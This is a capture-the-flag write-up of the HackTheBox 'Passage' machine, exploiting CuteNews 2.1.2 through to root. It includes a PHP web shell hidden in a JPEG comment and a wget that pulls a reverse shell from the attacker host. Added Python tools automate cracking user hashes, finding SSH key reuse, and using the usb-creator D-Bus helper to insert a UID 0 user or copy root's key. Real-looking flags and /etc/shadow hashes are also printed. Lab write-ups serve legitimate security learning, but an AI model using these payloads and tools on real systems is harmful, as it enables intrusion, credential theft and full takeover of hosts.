
HackTheBox-Passage

Name:Passage
OS:Linux
Diff:Medium

0x01 Enumeration

Nmap Scan

22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))

http-80

The page source (right-click, View Source) references another path on the site:

<script src="CuteNews/libs/js/jquery.js"></script>

Browsing to http://passage.htb/CuteNews/ gives an admin login page; the "Powered by" line at the bottom identifies the CMS and version as CuteNews 2.1.2.

searchsploit CuteNews


CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution | php/webapps/48800.py

The exploit descriptions show that this version's upload check can be bypassed: the file must be a genuine image, but it can be saved with a .php extension. So the payload is a real JPEG with PHP code embedded in its comment field via exiftool:

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' 65301509.jpg

Change the extension to .php when uploading. Once the file is in place it executes as PHP, and the cmd parameter can be used to pull a reverse shell from a web server on the attacking host:

?cmd=wget%20http://10.10.14.45:8000/php-reverse-shell.php

Start a listener, then request the downloaded php-reverse-shell.php to get the shell.

0x02 Get Shell

$ nc -lvnp 1234
Connection from 10.129.2.25:47374
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
22:19:48 up 2:10, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
nadav tty7 :0 20:09 2:10m 5.17s 0.32s /sbin/upstart --user
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Privilege Escalation(user)

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash

$ groups paul
paul : paul
$ groups nadav
nadav : nadav adm cdrom sudo dip plugdev lpadmin sambashare

Running linpeas.sh for enumeration turned up nothing useful. Going back to the web root, the files under /var/www/html/CuteNews/cdata/users/ contain base64-encoded lines (encoded, not encrypted); decoding one yields a PHP-serialized user record:

echo 'YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19' | base64 -d
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}

Looking the SHA-256 hash up on cmd5 (an online hash lookup service) gives atlanta1:

e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1
paul-coles:atlanta1
paul:atlanta1

nadav's SHA-256 hash is in the same directory, but it was not found in the online databases.
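The decode-and-crack step above as an added example (not code from the writeup): it base64-decodes the record quoted above, parses the PHP-serialized array with a small unserialize() implementation (arrays, strings, ints, bools and null are the only types CuteNews writes here), pulls out each user's name, email, acl and hash, and checks wordlist candidates against the unsalted SHA-256 that CuteNews 2.1.2 stores, so the lookup can be done offline instead of on cmd5. The record constant is the page's own base64 line; the function names are mine.

```python
"""Decode a CuteNews cdata/users record and test its unsalted SHA-256 hashes offline."""
import base64
import hashlib

# The base64 line quoted in the writeup (from /var/www/html/CuteNews/cdata/users/).
RECORD_B64 = (
    "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIx"
    "NTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6"
    "NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xl"
    "cyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQx"
    "MzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJi"
    "YW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19"
)


def php_unserialize(data, pos=0):
    """Minimal PHP unserialize() for arrays, strings, ints, bools and null.

    Returns (value, next_position). String lengths are byte counts, as in PHP."""
    t = chr(data[pos])
    if t == "N":                                   # N;
        return None, pos + 2
    if t in "ib":                                  # i:123;  b:1;
        end = data.index(b";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if t == "b" else num), end + 1
    if t == "s":                                   # s:LEN:"bytes";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                          # skip :"
        value = data[start:start + length].decode("utf-8", "replace")
        return value, start + length + 2           # skip ";
    if t == "a":                                   # a:COUNT:{key;value;...}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                            # skip :{
        result = {}
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            value, pos = php_unserialize(data, pos)
            result[key] = value
        return result, pos + 1                     # skip }
    raise ValueError(f"unsupported PHP type {t!r} at offset {pos}")


def decode_record(line):
    """base64 -> PHP serialized bytes -> Python dict, refusing trailing garbage."""
    raw = base64.b64decode(line.strip())
    value, end = php_unserialize(raw)
    if end != len(raw):
        raise ValueError("trailing data after serialized value")
    return value


def extract_users(record):
    """Flatten a record ({index name: {key: user array}}) into a list of user dicts."""
    users = []
    for index in record.values():
        if not isinstance(index, dict):
            continue
        for user in index.values():
            if isinstance(user, dict) and "pass" in user:
                users.append({k: user.get(k) for k in ("name", "email", "acl", "pass")})
    return users


def sha256_hex(word):
    return hashlib.sha256(word.encode()).hexdigest()


def crack_sha256(digest, wordlist):
    """CuteNews 2.1.2 stores sha256(password) with no salt: one hash per candidate."""
    digest = digest.lower()
    for word in wordlist:
        if sha256_hex(word) == digest:
            return word
    return None


if __name__ == "__main__":
    for u in extract_users(decode_record(RECORD_B64)):
        # The writeup's cmd5 lookup resolved this hash to atlanta1; a local wordlist
        # check is the offline equivalent (any wordlist file can replace this list).
        hit = crack_sha256(u["pass"], ["password", "atlanta1"])
        print(f'{u["name"]} <{u["email"]}> acl={u["acl"]} sha256={u["pass"]} -> {hit}')
```

Every file in cdata/users/ holds several such lines (one per index: name, email, id and so on), so in practice loop over all lines of all files and dedupe on the name field; the acl value is what separates administrators from ordinary users when choosing whom to target.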

python3 -c 'import pty;pty.spawn("/bin/bash")'

su paul
atlanta1

whoami
paul

id
uid=1001(paul) gid=1001(paul) groups=1001(paul)

user.txt:7fdc538629d64dd7a35dceba4d4d7098

paul is not a privileged user, but his ~/.ssh directory shows that nadav can log into paul directly with key authentication (nadav's key is in paul's authorized_keys). The guess was that paul's own key would likewise be accepted by nadav's account, which it is:

paul@passage:~$ ssh nadav@localhost
Last login: Sat Jan 23 23:09:31 2021 from 127.0.0.1
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
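The key-reuse inference above, generalized, as an added example that is not part of the writeup: it fingerprints every ~user/.ssh/*.pub and every authorized_keys entry the same way ssh-keygen -lf does (SHA256 of the decoded key blob) and reports each account whose own key is accepted by a different account, which is exactly the lateral move from paul to nadav. The sample keys are constructed placeholders, not the box's real key material; collect_from_home() reads real home directories when run on a host.

```python
"""Find SSH key pairs whose public half is accepted by another local account."""
import base64
import hashlib
from pathlib import Path

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ssh-dss",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def parse_pubkey(line):
    """(fingerprint, comment) for one OpenSSH public-key line, or None.
    Tolerates a leading options field (command="...",no-pty ssh-rsa ...)."""
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if tok in KEY_TYPES and i + 1 < len(tokens):
            blob = base64.b64decode(tokens[i + 1])
            fp = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
            return "SHA256:" + fp, " ".join(tokens[i + 2:])   # same value ssh-keygen -lf prints
    return None


def find_key_reuse(pubkeys, authorized):
    """pubkeys: {owner: [lines from ~owner/.ssh/*.pub]}; authorized: {account: authorized_keys text}.
    Returns (owner, account, fingerprint, comment) for every key an owner holds that a
    different account accepts, i.e. owner can `ssh account@localhost` with their own key."""
    accepted = {}                                     # fingerprint -> {account: comment}
    for account, text in authorized.items():
        for line in text.splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            parsed = parse_pubkey(line)
            if parsed:
                accepted.setdefault(parsed[0], {})[account] = parsed[1]
    findings = []
    for owner, lines in pubkeys.items():
        for line in lines:
            parsed = parse_pubkey(line)
            if not parsed:
                continue
            for account, comment in accepted.get(parsed[0], {}).items():
                if account != owner:
                    findings.append((owner, account, parsed[0], comment))
    return findings


def collect_from_home(home_root="/home"):
    """Read whatever .ssh material the current user may read under each home directory
    (on the box, paul's .ssh was readable from the www-data shell)."""
    pubkeys, authorized = {}, {}
    for home in Path(home_root).iterdir():
        ssh = home / ".ssh"
        try:
            pubkeys[home.name] = [p.read_text() for p in ssh.glob("*.pub")]
            if (ssh / "authorized_keys").is_file():
                authorized[home.name] = (ssh / "authorized_keys").read_text()
        except (PermissionError, FileNotFoundError):
            continue
    return pubkeys, authorized


# Constructed sample, not real key material: one fake blob is paul's own id_rsa.pub and
# also sits in both users' authorized_keys, the situation the writeup infers on the box.
SHARED_BLOB = base64.b64encode(b"constructed placeholder, not an RSA key (shared)").decode()
ROOT_BLOB = base64.b64encode(b"constructed placeholder, not an RSA key (root)").decode()
SAMPLE_PUBKEYS = {
    "paul": [f"ssh-rsa {SHARED_BLOB} nadav@passage"],
    "nadav": [f"ssh-rsa {SHARED_BLOB} nadav@passage"],
}
SAMPLE_AUTHORIZED = {
    "paul": f"ssh-rsa {SHARED_BLOB} nadav@passage\n",
    "nadav": f"# managed by hand\nssh-rsa {SHARED_BLOB} nadav@passage\n",
    "root": f'command="/bin/true" ssh-rsa {ROOT_BLOB} root@passage\n',
}

if __name__ == "__main__":
    for owner, account, fp, comment in find_key_reuse(SAMPLE_PUBKEYS, SAMPLE_AUTHORIZED):
        print(f"{owner}'s key ({fp}, '{comment}') is accepted by {account}")
```

On a real host the interesting output is any row where the owner is the account you already hold; the root entry in the sample shows why the comparison is by fingerprint rather than by the comment string, since comments are free text and options fields can precede the key type.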

0x03 Privilege Escalation(root)

I was stuck here for a long time. Eventually the process list showed root running the following service, and a search turned up a known privilege escalation in usb-creator on Ubuntu Desktop: its D-Bus helper exposes a method that copies an arbitrary source file to an arbitrary destination as root.

ps -ef |grep root
root 53246 1 0 23:23 ? 00:00:00 /usr/bin/python3 /usr/share/usb-creator/usb-creator-helper

Escalate by overwriting /etc/passwd: copy the real file, append a UID 0 user whose password hash you control, and have the helper write the copy back over /etc/passwd as root.

nadav@passage:~$ cp /etc/passwd ./
nadav@passage:~$ echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >>./passwd
nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/passwd /etc/passwd true
()
nadav@passage:~$ su new
Password:
root@passage:/home/nadav# whoami;hostname
root
passage

Alternatively, use the same method to copy root's private key out; the helper reads it as root, so the source does not need to be readable by nadav:

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true
nadav@passage:/tmp$ ssh -i id_rsa root@localhost
Last login: Sat Jan 23 23:24:41 2021 from 127.0.0.1
root@passage:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
passage
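The usb-creator procedure above packaged as an added example (not the writeup's code): it builds the same gdbus call, generates the passwd entry from a hash you choose, refuses to stage a /etc/passwd copy that drops an existing line (a truncated passwd locks everyone out, including you), keeps a backup, and lists UID 0 accounts afterwards, which is also the check a defender runs after such an incident. The same copy_as_root() call reads /root/.ssh/id_rsa. Assumptions: gdbus and openssl are on PATH; the name of the trailing boolean argument is not given on the page, so it is simply passed through as true.

```python
"""Drive com.ubuntu.USBCreator.Image (the usb-creator D-Bus helper) with the checks done first."""
import subprocess
from pathlib import Path

DEST = "com.ubuntu.USBCreator"
OBJECT_PATH = "/com/ubuntu/USBCreator"


def introspect_argv():
    """gdbus introspect lists the helper's methods and argument types before anything is called."""
    return ["gdbus", "introspect", "--system", "--dest", DEST, "--object-path", OBJECT_PATH]


def gdbus_image_argv(source, target, flag=True):
    """The same call the writeup makes: Image copies source to target as root.
    The third argument's name is not given on the page; it is passed through as the page does."""
    return ["gdbus", "call", "--system", "--dest", DEST, "--object-path", OBJECT_PATH,
            "--method", DEST + ".Image", str(source), str(target), "true" if flag else "false"]


def copy_as_root(source, target):
    """The helper does the read and the write as root, so source need not be readable by
    the caller (that is how /root/.ssh/id_rsa is copied out)."""
    return subprocess.run(gdbus_image_argv(source, target),
                          check=True, capture_output=True, text=True).stdout


def md5crypt(password, salt="new"):
    """MD5-crypt hash in the $1$salt$... form the writeup's entry uses (needs openssl on PATH)."""
    return subprocess.run(["openssl", "passwd", "-1", "-salt", salt, password],
                          check=True, capture_output=True, text=True).stdout.strip()


def passwd_line(user, crypt_hash, uid=0, gid=0, shell="/bin/bash"):
    """One /etc/passwd entry; uid 0 makes `su user` a root shell once the file is in place."""
    if ":" in user or ":" in crypt_hash:
        raise ValueError("':' is the passwd field separator")
    return f"{user}:{crypt_hash}:{uid}:{gid}:root:/root:{shell}"


def uid0_accounts(passwd_text):
    """Every account with uid 0: the attacker's confirmation and the defender's check."""
    return [f[0] for f in (l.split(":") for l in passwd_text.splitlines())
            if len(f) >= 7 and f[2] == "0"]


def is_safe_replacement(old_text, new_text):
    """Refuse a replacement that drops any existing line or leaves no uid-0 account."""
    new_lines = set(new_text.splitlines())
    kept = all(l in new_lines for l in old_text.splitlines() if l)
    return kept and bool(uid0_accounts(new_text))


def build_passwd_text(original, user, crypt_hash):
    """The original file plus one appended root-equivalent user, validated before use."""
    new_text = original.rstrip("\n") + "\n" + passwd_line(user, crypt_hash) + "\n"
    if not is_safe_replacement(original, new_text):
        raise RuntimeError("replacement would lose lines; not writing it")
    return new_text


def add_root_user(user, password, workdir="/home/nadav"):
    """Back up, build, copy in as root, then show uid-0 accounts. Returns the backup path."""
    original = Path("/etc/passwd").read_text()
    backup = Path(workdir) / "passwd.bak"
    backup.write_text(original)            # restore later with copy_as_root(backup, "/etc/passwd")
    staged = Path(workdir) / "passwd"
    staged.write_text(build_passwd_text(original, user, md5crypt(password, salt=user[:8])))
    copy_as_root(staged, "/etc/passwd")
    print("uid 0 accounts now:", uid0_accounts(Path("/etc/passwd").read_text()))
    return backup


if __name__ == "__main__":
    import sys
    # python3 usbcreator_image.py introspect | addroot <user> <password> | copy <src> <dst>
    cmd, args = (sys.argv[1] if len(sys.argv) > 1 else ""), sys.argv[2:]
    if cmd == "introspect":
        print(subprocess.run(introspect_argv(), check=True, capture_output=True, text=True).stdout)
    elif cmd == "addroot":
        print("backup written to", add_root_user(*args))
    elif cmd == "copy":
        print(copy_as_root(*args))
    else:
        print(__doc__)
```

Run the introspect subcommand first: if the Image method is absent or the call is rejected for the calling user, the rest is moot, and the output tells you the argument types without guessing. After the exercise, copy the backup back the same way so the box is left as found.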
root.txt:b78635dda225dbe1bb6b72f7a19fc2f5

/etc/shadow

root:$6$mjc8Tvgr$L56bn5KQDtOyKRdXBTL4xcmT7FVWJbds.Fo0FVc11PWliaNu5ASAxKzaEddyaYGMxGQPUNo5UpxT/nawzS8TW0:18464:0:99999:7:::
nadav:$6$D30IVulR$vENayGqKX8L0RYB/wcf7ZMfFHyCedmEIu4zXw7bZcH3GBrCrBzHJ3Y/in96pthdcp5cU.0UTXobQLu7T0INzk1:18464:0:99999:7:::
paul:$6$cpGlwRS2$AhcQyxAskjvAQtS4vpO0VgNW0liHRbLSosZlrHpzL3XTfPHmeDL7hWkut1kCjgNnEHIdU9J019hQTAMH6nzxe1:18464:0:99999:7:::